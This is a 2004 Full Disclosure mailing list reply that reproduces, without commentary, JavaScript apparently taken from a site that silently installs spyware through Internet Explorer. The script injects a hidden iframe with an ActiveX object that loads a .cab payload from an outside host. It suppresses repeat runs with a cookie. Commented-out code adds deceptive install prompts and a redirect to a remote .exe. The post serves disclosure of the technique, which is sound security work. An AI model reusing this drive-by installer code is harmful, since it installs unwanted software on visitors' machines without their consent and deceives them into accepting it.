Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Mark Shirley <mshirley () gmail com>
Date: Mon, 4 Oct 2004 11:21:49 -0400
var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab&apos;;      
var retry_enabled = true;
var retry_cnt=1;

executeScript(getCookie('minpopup80wu03rd'));


function executeScript(CookieExists) {

        //Check if cookie exists, if it does we know the user has visited the
site within the last 24 hrs so don't load the script
        if (CookieExists!=null) {

                //If cookie does exists then exit
                
                return null;

                }
        else {

                //If cookie does not exist then we can assume the user has not been
to the site within the last 24 hrs
                document.write('<iframe id="downloads_manager"
style="position:absolute;visibility:hidden;"></iframe>');
                
              document_code = '<html><head>\n';
              document_code += '<\/head><body>\n';
              document_code += '<object
onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
              document_code += '<\/body><\/html>';
              downloads_manager.document.write(document_code);
              downloads_manager.document.close();

                setCookie('minpopup80wu03rd','test',1);

                }
        }



function retry()
{
        //if(retry_cnt>0) 
        //{
                //setCookie('minpopup80wu03rd','test',0);
                //alert("To install latest At-Games Games update, please click Yes"); 
                //document_code = '<html><head>\n';
                //document_code += '<\/head><body>\n';
                //document_code += '<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0></object>\n';
                //document_code += '<\/body><\/html>';
                //downloads_manager.document.write(document_code);
                //downloads_manager.document.close();
                //setCookie('minpopup80wu03rd','test',1);
                //retry_cnt--;
        //} else {
                        //alert("This is a 1 time install, once you click Open it will
never pop up this message again");
                        //window.location =
"http://www.NetpalOffers.net/NetpalOffers/DMOXe/80wu03rd.exe";;
        //}
}


function getCookie(NameOfCookie) {

if (document.cookie.length > 0)  { 

        begin = document.cookie.indexOf(NameOfCookie+"="); 
        if (begin != -1) { 

        begin += NameOfCookie.length+1; 
        end = document.cookie.indexOf(";", begin);

        if (end == -1) end = document.cookie.length;
                return unescape(document.cookie.substring(begin, end)); } 
        }
        return null; 

}


function setCookie(NameOfCookie, value, expiredays) {

var ExpireDate = new Date ();
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));

document.cookie = NameOfCookie + "=" + escape(value) + 
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: